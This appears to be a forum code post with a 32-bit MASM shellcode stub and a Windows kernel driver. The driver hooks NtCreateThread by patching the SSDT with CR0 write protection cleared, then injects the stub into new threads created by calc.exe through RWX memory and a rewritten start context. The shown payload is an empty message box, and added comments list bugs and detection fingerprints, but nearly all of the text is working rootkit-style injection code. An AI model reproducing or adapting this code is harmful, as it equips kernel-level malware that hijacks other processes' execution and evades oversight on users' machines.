LoadShell.Asm- .686p
- .model flat,StdCall
- option casemap:none
- .code
- ;-----------------------------------------------------------------------
- ; Position-independent stub: the bytes from CODE_START to CODE_END are
- ; copied as one flat blob into another process (see GetShellInfo and
- ; Driver.cpp on this page). Assembled as 32-bit MASM (.686p, flat model,
- ; StdCall, case-sensitive symbols - directives above).
- ; Layout: offset 0 is dwEntry, a slot the injector fills with the original
- ; thread entry point; execution begins at `start` (offset 4).
- ; Visible behaviour: resolve LoadLibraryA from kernel32, load user32.dll,
- ; resolve MessageBoxA, call MessageBoxA with four zero arguments, then
- ; restore every register and flag and transfer to dwEntry via `ret`.
- ; Defender note: call/pop self-location, PEB module-list walking and manual
- ; export-table parsing are the usual static fingerprints of such a stub.
- ;-----------------------------------------------------------------------
- CODE_START:
- dwEntry dd 0                    ; filled in by the injector with the original entry point (must stay at offset 0)
- start:
- push edx                        ; reserve one dword; rewritten with dwEntry below and consumed by the final ret
- pushad                          ; save all general registers (32 bytes)
- pushfd                          ; save EFLAGS (4 bytes) -> the reserved slot is now at [esp + 024h]
- call CODE_ADDR                  ; push EIP so the blob can compute its own load address
- CODE_ADDR:
- pop ebx
- sub ebx, CODE_ADDR              ; ebx = load address - assembled address; added to every data reference
- call GetKernel32Base            ; eax = kernel32 base (PEB walk, see below)
- lea edx, [ebx + szLoadLibrary]
- push edx                        ; lpProcName = "LoadLibraryA"
- push eax                        ; hModule    = kernel32
- call GetApiAddr                 ; eax = &LoadLibraryA (proc has params under .model StdCall, so it pops both)
- lea edx, [ebx + szUser]
- push edx
- call eax                        ; eax = LoadLibraryA("user32.dll")
- lea edx, [ebx + szMessageBox]
- push edx                        ; lpProcName = "MessageBoxA"
- push eax                        ; hModule    = user32
- call GetApiAddr                 ; eax = &MessageBoxA
- push 0
- push 0
- push 0
- push 0
- call eax                        ; MessageBoxA(0, 0, 0, 0): the only payload visible on this page is an empty message box
- lea edx, [ebx + dwEntry]
- mov edx, [edx]                  ; edx = original entry point stored in dwEntry
- mov [esp + 024h], edx           ; 4 (pushfd) + 32 (pushad) = 024h: overwrite the slot reserved by `push edx`
- popfd                           ; restore flags ...
- popad                           ; ... and all registers exactly as on entry
- ret                             ; pops the patched slot into EIP -> continues at the original entry point
- 
- szUser db 'user32.dll',0
- szLoadLibrary db 'LoadLibraryA',0
- szMessageBox db 'MessageBoxA',0
-
- ;-----------------------------------------------------------------------
- ; GetKernel32Base: eax = DllBase of the third entry of the PEB's
- ; InLoadOrderModuleList (the walk assumes the order exe -> ntdll -> kernel32).
- ; In:    nothing (reads fs:[30h])
- ; Out:   eax = DllBase of the third list entry
- ; Clobb: eax (mov does not touch flags)
- ; NOTE(review): the offsets (PEB.Ldr at +0Ch, InLoadOrderModuleList at +0Ch,
- ;   DllBase at +18h) and the load order are 32-bit Windows assumptions that
- ;   are not guaranteed across versions.
- ;-----------------------------------------------------------------------
- GetKernel32Base proc
- assume fs:nothing               ; let MASM emit an fs: override without a segment assumption
- mov eax, [fs:30h]               ; TEB+30h -> PEB
- mov eax, [eax + 0ch]            ; PEB -> Ldr (PEB_LDR_DATA)
- mov eax, [eax + 0ch]            ; Ldr -> InLoadOrderModuleList.Flink (1st entry: the exe)
- mov eax, [eax]                  ; 2nd entry (ntdll)
- mov eax, [eax]                  ; 3rd entry (kernel32)
- mov eax, [eax + 018h]           ; LDR_DATA_TABLE_ENTRY.DllBase
- ret
- GetKernel32Base endp
-
- ;-----------------------------------------------------------------------
- ; GetNtdllBase: same walk as GetKernel32Base with one dereference fewer,
- ; i.e. eax = DllBase of the second InLoadOrderModuleList entry (ntdll).
- ; Not referenced anywhere on this page, but it sits inside the
- ; CODE_START..CODE_END blob and is copied along with it.
- ; In:    nothing (reads fs:[30h])
- ; Out:   eax = DllBase of the second list entry
- ; Clobb: eax
- ;-----------------------------------------------------------------------
- GetNtdllBase proc
- assume fs:nothing
- mov eax, [fs:30h]               ; TEB+30h -> PEB
- mov eax, [eax + 0ch]            ; PEB -> Ldr
- mov eax, [eax + 0ch]            ; InLoadOrderModuleList.Flink (the exe)
- mov eax, [eax]                  ; 2nd entry (ntdll)
- mov eax, [eax + 018h]           ; DllBase
- ret
- GetNtdllBase endp
-
- ;-----------------------------------------------------------------------
- ; GetApiAddr: minimal GetProcAddress over the PE export directory.
- ; DWORD GetApiAddr(DWORD hModule, DWORD lpProcName)   (StdCall, params on the MASM frame)
- ; In:    hModule    = image base
- ;        lpProcName = ANSI name, or an ordinal when the high 16 bits are zero
- ; Out:   eax = address of the export, or 0 on failure (error:)
- ; Saves: ebx, ecx, edx, edi, esi
- ; Export-directory fields used (offsets from IMAGE_EXPORT_DIRECTORY):
- ;   +10h Base, +14h NumberOfFunctions, +18h NumberOfNames,
- ;   +1Ch (7*4) AddressOfFunctions, +20h (8*4) AddressOfNames.
- ; NOTE(review): AddressOfNameOrdinals (+24h) is never read; the name-table
- ;   index (already incremented once at cmpend) minus Base is used directly
- ;   as the function index, which only holds while the two tables are parallel.
- ; NOTE(review): the two dwords pushed after e_lfanew are only removed by the
- ;   `add esp, 8` on the success path; the error path reaches END_PROC with
- ;   them still on the stack, so the five pops there restore the wrong values.
- ;-----------------------------------------------------------------------
- GetApiAddr proc hModule:DWORD, lpProcName:DWORD
- push ebx
- push ecx
- push edx
- push edi
- push esi
- mov eax, hModule
- mov ebx, [eax + 3ch]            ; ebx = e_lfanew (RVA of IMAGE_NT_HEADERS)
- 
- push [ebx + eax + 7ch]          ; export directory size (DataDirectory[0].Size, PE32 layout)
- mov ebx, [ebx + eax + 78h]      ; export directory RVA  (DataDirectory[0].VirtualAddress)
- push ebx
- 
- add ebx, eax                    ; ebx = VA of IMAGE_EXPORT_DIRECTORY
- mov edi, lpProcName
- mov edx, [ebx + 10h]            ; edx = Base (first ordinal)
- test edi, 0FFFF0000h            ; high word zero -> lookup by ordinal
- jz next
- xor eax, eax                    ; eax = name-table index
- 
- _LABEL:                         ; for each exported name
- cmp eax, [ebx + 18h]            ; index >= NumberOfNames -> not found
- jae error
- 
- push edi                        ; keep the requested name's start; edi walks the string below
- mov esi, [ebx + 8 * 4]          ; AddressOfNames RVA
- add esi, hModule
- mov esi, [esi + eax * 4]        ; RVA of the eax-th name
- add esi, hModule                ; esi = exported name (VA)
- again:                          ; byte-wise compare; cl = export char, ch = requested char
- mov cl, byte ptr[esi]
- mov ch, byte ptr[edi]
- test cl, cl
- jz cmpend                       ; end of exported name: match iff ch is also 0
- 
- inc esi
- inc edi
- cmp cl, ch
- jz again
- or cl, 20h                      ; retry with the export char forced to lower case (cl only, ch untouched)
- cmp cl, ch
- jz again
- cmpend:
- inc eax                         ; eax = index + 1 (this value, not the index, is carried into `go` on a match)
- pop edi                         ; restore the requested name's start
- cmp cl, ch                      ; equal terminators -> match; otherwise try the next name
- jnz _LABEL
- 
- cmp eax, [ebx + 14h]            ; result unused: no conditional jump follows
- 
- mov edi, eax                    ; edi = matched name index + 1
- mov eax, hModule
- jmp go
- normal:                         ; unreachable: nothing jumps here
- jmp END_PROC
- next:
- go:                             ; ordinal path enters with edi = ordinal, eax = hModule
- sub edi, edx                    ; edi -= Base
- cmp edi, [ebx + 14h]            ; unsigned compare against NumberOfFunctions; edi == count is still accepted (off by one)
- ja error
- mov ebx, [ebx + 7 * 4]          ; AddressOfFunctions RVA
- add ebx, hModule
- mov ebx, [ebx + 4 * edi]        ; function RVA
- add eax, ebx                    ; eax = hModule + RVA
- add esp, 8                      ; drop the two dwords pushed after e_lfanew (success path only)
- jmp END_PROC
- error:
- xor eax, eax                    ; return 0 (see header note: the stack is still unbalanced here)
- END_PROC:
- pop esi
- pop edi
- pop edx
- pop ecx
- pop ebx
- ret                             ; MASM expands this to the StdCall epilogue for a proc with params
- GetApiAddr endp
- CODE_END:                       ; end of the blob copied by the injector (size = CODE_END - CODE_START)
- ;-----------------------------------------------------------------------
- ; GetShellInfo: report the blob's start address and size to the caller.
- ; VOID GetShellInfo(PULONG lpStart, PULONG lpSize)   (StdCall; called from Driver.cpp)
- ; In:    lpStart, lpSize = output pointers; if either is 0 the proc returns without writing
- ; Out:   *lpStart = address of CODE_START, *lpSize = CODE_END - CODE_START
- ; Clobb: eax, ebx
- ; NOTE(review): ebx is callee-saved in the 32-bit Windows calling convention
- ;   and is not preserved here, so the C++ caller cannot rely on it afterwards.
- ;-----------------------------------------------------------------------
- GetShellInfo proc lpStart:DWORD, lpSize:DWORD
- .if lpStart == 0
- ret
- .endif
- .if lpSize == 0
- ret
- .endif
- 
- mov eax, CODE_END
- sub eax, CODE_START             ; eax = blob size in bytes
- mov ebx, lpSize
- mov [ebx], eax                  ; *lpSize = size
- mov eax, CODE_START
- mov ebx, lpStart
- mov [ebx], eax                  ; *lpStart = address of CODE_START
- ret
- 
- GetShellInfo endp
- end start
-
复制代码 Driver.h- #ifdef __cplusplus
- extern "C"
- {
- #endif
- #include <ntifs.h>
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath);
- #ifdef __cplusplus
- }
- #endif
- // Section-placement helpers used as `#pragma PAGEDCODE` etc. in Driver.cpp
- // (PAGE = pageable, default = non-paged, INIT = discarded after DriverEntry).
- #define PAGEDCODE code_seg("PAGE")
- #define LOCKEDCODE code_seg()
- #define INITCODE code_seg("INIT")
- #define PAGEDDATA data_seg("PAGE")
- #define LOCKEDDATA data_seg()
- #define INITDATA data_seg("INIT")
- #define arraysize(p) (sizeof(p)/sizeof((p)[0]))
- VOID DriverUnload(IN PDRIVER_OBJECT DriverObject);
- // Hand-declared copy of the undocumented INITIAL_TEB argument of NtCreateThread (32-bit layout;
- // only passed through by MyNtCreateThread, never dereferenced on this page).
- typedef struct _INITIAL_TEB {
- struct {
- PVOID OldStackBase;
- PVOID OldStackLimit;
- } OldInitialTeb;
- PVOID StackBase;
- PVOID StackLimit;
- PVOID StackAllocationBase;
- } INITIAL_TEB, *PINITIAL_TEB;
- // Replacement for the NtCreateThread system service; DriverEntry writes its address into the SSDT.
- NTSTATUS MyNtCreateThread(
- __out PHANDLE ThreadHandle,
- __in ACCESS_MASK DesiredAccess,
- __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
- __in HANDLE ProcessHandle,
- __out PCLIENT_ID ClientId,
- __in PCONTEXT ThreadContext,
- __in PINITIAL_TEB InitialTeb,
- __in BOOLEAN CreateSuspended
- );
- // Signature used to call the saved original service pointer (g_pfnRealNtCreateThread).
- typedef NTSTATUS (*pNtCreateThread)(
- __out PHANDLE ThreadHandle,
- __in ACCESS_MASK DesiredAccess,
- __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
- __in HANDLE ProcessHandle,
- __out PCLIENT_ID ClientId,
- __in PCONTEXT ThreadContext,
- __in PINITIAL_TEB InitialTeb,
- __in BOOLEAN CreateSuspended
- );
- // Undocumented kernel export; NOTE(review): it yields the short EPROCESS image name, not a full
- // path - confirm the length/format for the target build before relying on string compares.
- EXTERN_C NTKERNELAPI UCHAR * PsGetProcessImageFileName(
- __in PEPROCESS Process
- );
- // Layout of a KeServiceDescriptorTable entry (32-bit); packed so field offsets match the kernel's.
- #pragma pack(1)
- typedef struct ServiceDescriptorEntry {
- unsigned int *ServiceTableBase;        // array of system-service entry points, indexed by service number
- unsigned int *ServiceCounterTableBase; // only used in checked builds
- unsigned int NumberOfServices;         // table bound; GetSDDTAddr/HookSSDT/UnHookSSDT do not check uIndex against it
- unsigned char *ParamTableBase;
- } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
- #pragma pack()
- // Exported by the 32-bit kernel only; 64-bit kernels do not export this symbol.
- extern "C" PServiceDescriptorTableEntry_t KeServiceDescriptorTable;
- ULONG GetSDDTAddr(ULONG uIndex);                    // read ServiceTableBase[uIndex]
- BOOLEAN HookSSDT(ULONG uIndex, ULONG uNewAddr);     // overwrite ServiceTableBase[uIndex]; FALSE only when uNewAddr == 0
- BOOLEAN UnHookSSDT(ULONG uIndex, ULONG uOldAddr);   // same store with the saved value; FALSE only when uOldAddr == 0
复制代码 Driver.cpp- #include "Driver.h"
- //global
- pNtCreateThread g_pfnRealNtCreateThread = NULL;   // original SSDT entry saved by DriverEntry; MyNtCreateThread forwards to it
- BOOLEAN g_bHookDll = FALSE;                        // one-shot flag: set after the first injection so later calls pass straight through
- // Re-enable kernel write protection: set CR0.WP (bit 16, 10000h) and re-enable interrupts.
- // Pairs with PageProtectOff(); HookSSDT/UnHookSSDT bracket a single SSDT store between the two.
- // NOTE(review): sti/cli act on the current CPU only; other processors keep running while WP is clear.
- // Defender note: a driver toggling CR0.WP is itself a strong indicator of kernel patching.
- void PageProtectOn()
- {
- //restore memory protection
- __asm
- {
- mov eax, cr0
- or eax, 10000h      // set WP
- mov cr0, eax
- sti                 // interrupts were disabled by PageProtectOff
- }
- }
- // Disable interrupts on this CPU and clear CR0.WP (bit 16) so supervisor writes to read-only pages succeed.
- // Must be followed by PageProtectOn() on every path; nothing here restores state if the caller faults in between.
- // NOTE(review): cli only affects the current CPU; it is not a system-wide lock.
- void PageProtectOff()
- {
- //disable memory protection
- __asm
- {
- cli
- mov eax, cr0
- and eax, not 10000h // clear WP
- mov cr0, eax
- }
- }
- // Copy uBufferSize bytes from the kernel buffer Buffer to user address BaseAddress in the process behind hProcess.
- // Returns TRUE on success, FALSE if the handle cannot be referenced or the probe/copy raises an exception.
- // The write attaches to the target's address space (KeStackAttachProcess) and copies directly; ProbeForWrite
- // raises (caught by __except) if BaseAddress is not a writable user-mode range.
- // NOTE(review): the reference taken by ObReferenceObjectByHandle is never released (no ObDereferenceObject),
- //   so every call leaks one reference on the target EPROCESS.
- BOOLEAN MyNtWriteProcessMemory(PVOID BaseAddress, PVOID Buffer ,ULONG uBufferSize, HANDLE hProcess)
- {
- PEPROCESS Eprocess = NULL;
- NTSTATUS status = ObReferenceObjectByHandle(hProcess, PROCESS_ALL_ACCESS, NULL, KernelMode, (PVOID *)&Eprocess, NULL);
- if (!NT_SUCCESS(status))
- {
- return FALSE;
- }
- KAPC_STATE ApcState;
- KeStackAttachProcess(Eprocess, &ApcState);        // from here BaseAddress is resolved in the target's address space
- __try
- {
- ProbeForWrite(BaseAddress, uBufferSize, sizeof(UCHAR));
- RtlCopyMemory(BaseAddress, Buffer, uBufferSize);
- KeUnstackDetachProcess(&ApcState);
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- KeUnstackDetachProcess(&ApcState);                // detach on the failure path too; the reference is still not released
- return FALSE;
- }
- return TRUE;
- }
- EXTERN_C VOID GetShellInfo(PULONG puStartAddr, PULONG puSize);   // implemented in LoadShell.Asm; yields CODE_START and CODE_END - CODE_START
- // SSDT replacement for NtCreateThread. Behaviour visible on this page:
- //  1. on the first call whose *current* process image name is "calc.exe" (case-insensitive),
- //     allocate a PAGE_EXECUTE_READWRITE region in the process behind ProcessHandle;
- //  2. write the original ThreadContext->Eax as the first dword (the blob's dwEntry slot), then
- //     copy the blob body behind it;
- //  3. point ThreadContext->Eax at the blob's `start` label (base + 4) and set g_bHookDll;
- //  4. in every case forward to the saved original service (GOON:).
- // Any failure before step 3 falls through to the original call with the context untouched.
- // NOTE(review): step 3 relies on Eax of the initial CONTEXT carrying the thread's start routine
- //   (the 32-bit XP-era kernel32 thread-start convention) - confirm for the target OS build.
- // NOTE(review): the second copy starts at uShellStart + 4 but still copies uShellSize bytes, i.e. it
- //   reads 4 bytes past CODE_END; the page-rounded allocation hides this on the destination side.
- // Defender note: an RWX allocation in another process made from a kernel hook, followed by a rewritten
- //   start context, is a textbook injection pattern; on 32-bit kernels the hook itself is found by comparing
- //   ServiceTableBase entries against the on-disk kernel image, and 64-bit kernels block SSDT patching outright.
- NTSTATUS MyNtCreateThread(
- __out PHANDLE ThreadHandle,
- __in ACCESS_MASK DesiredAccess,
- __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
- __in HANDLE ProcessHandle,
- __out PCLIENT_ID ClientId,
- __in PCONTEXT ThreadContext,
- __in PINITIAL_TEB InitialTeb,
- __in BOOLEAN CreateSuspended
- )
- {
- if (!g_bHookDll)                                  // one-shot: only the first qualifying call is modified
- {
- PUCHAR pszName = PsGetProcessImageFileName(IoGetCurrentProcess());   // name of the calling process, not of the ProcessHandle target
- if (_stricmp((char *)pszName, "calc.exe") == 0)
- {
- ULONG uShellStart = 0;
- ULONG uShellSize = 0;
- GetShellInfo(&uShellStart, &uShellSize);
- if (uShellStart == 0 || uShellSize == 0)
- {
- goto GOON;
- }
- PVOID puShellCodeVa;
- puShellCodeVa = NULL;                             // NULL base: the kernel chooses the address
- ULONG uShellCodeSize = uShellSize;                // rounded up to whole pages by the call below
- NTSTATUS status = ZwAllocateVirtualMemory(ProcessHandle, &puShellCodeVa, NULL, &uShellCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- if (!NT_SUCCESS(status))
- {
- goto GOON;
- }
- ULONG uEntryEip = ThreadContext->Eax;             // original value the blob later returns to (see header note)
- BOOLEAN bRet = FALSE;
- bRet = MyNtWriteProcessMemory(puShellCodeVa, &uEntryEip, sizeof(ULONG), ProcessHandle);   // fills dwEntry at offset 0
- if (!bRet)
- {
- goto GOON;
- }
- bRet = MyNtWriteProcessMemory((PVOID)((ULONG)puShellCodeVa + sizeof(ULONG)), (PVOID)(uShellStart + sizeof(ULONG)), uShellSize, ProcessHandle);   // blob body from `start` onward
- if (!bRet)
- {
- goto GOON;
- }
- 
- ThreadContext->Eax = ((ULONG)puShellCodeVa + sizeof(ULONG));   // `start` label: dwEntry occupies the first 4 bytes
- g_bHookDll = TRUE;
- }
- }
- 
- GOON:
- return g_pfnRealNtCreateThread(ThreadHandle,
- DesiredAccess,
- ObjectAttributes,
- ProcessHandle,
- ClientId,
- ThreadContext,
- InitialTeb,
- CreateSuspended);
- }
- #pragma PAGEDCODE
- // Return ServiceTableBase[uIndex] from the kernel's service descriptor table.
- // NOTE(review): uIndex is not compared against NumberOfServices; an out-of-range index reads past the table.
- ULONG GetSDDTAddr(ULONG uIndex)
- {
- ULONG uAddr = (ULONG)KeServiceDescriptorTable->ServiceTableBase[uIndex];
- return uAddr;
- }
- // Overwrite ServiceTableBase[uIndex] with uNewAddr, clearing CR0.WP around the store.
- // Returns FALSE only when uNewAddr is 0; uIndex is not bounds-checked and the store is a plain
- // assignment (no interlocked exchange), so concurrent readers on other CPUs are not synchronized.
- BOOLEAN HookSSDT(ULONG uIndex, ULONG uNewAddr)
- {
- if (uNewAddr == 0)
- {
- return FALSE;
- }
- PageProtectOff();                                 // WP cleared + interrupts off on this CPU
- KeServiceDescriptorTable->ServiceTableBase[uIndex] = uNewAddr;
- PageProtectOn();
- return TRUE;
- }
- // Write uOldAddr back into ServiceTableBase[uIndex]; identical to HookSSDT apart from naming.
- // Returns FALSE only when uOldAddr is 0 (e.g. when DriverEntry never saved an original pointer).
- BOOLEAN UnHookSSDT(ULONG uIndex, ULONG uOldAddr)
- {
- if (uOldAddr == 0)
- {
- return FALSE;
- }
- PageProtectOff();
- KeServiceDescriptorTable->ServiceTableBase[uIndex] = uOldAddr;
- PageProtectOn();
- return TRUE;
- }
- #pragma INITCODE
- // Driver entry: save the current SSDT entry at service index 53 and replace it with MyNtCreateThread.
- // NOTE(review): 53 is a hard-coded service number; indices differ between Windows versions and nothing
- //   here verifies that entry 53 is NtCreateThread, so this only matches the build the author used.
- // RegistryPath is unused. Always returns STATUS_SUCCESS, even when no hook was installed.
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
- {
- NTSTATUS status = STATUS_SUCCESS;
- 
- ULONG uAddr = GetSDDTAddr(53);
- if (uAddr)
- {
- g_pfnRealNtCreateThread = (pNtCreateThread)uAddr;   // kept for UnHookSSDT and for the pass-through call
- HookSSDT(53, (ULONG)MyNtCreateThread);
- }
- DriverObject->DriverUnload = DriverUnload;
- return status;
- }
- #pragma PAGEDCODE
- // Unload: restore entry 53 to the saved original pointer. If DriverEntry never installed the hook,
- // g_pfnRealNtCreateThread is still NULL and UnHookSSDT returns FALSE without writing.
- // NOTE(review): nothing on this page waits for in-flight calls into MyNtCreateThread before the driver
- //   image is unmapped; the KdPrint text names DriverEntry although this is the unload routine.
- VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
- {
- 
- UnHookSSDT(53, (ULONG)g_pfnRealNtCreateThread);
- KdPrint(("DriverEntry unLoading...\n"));
- 
- }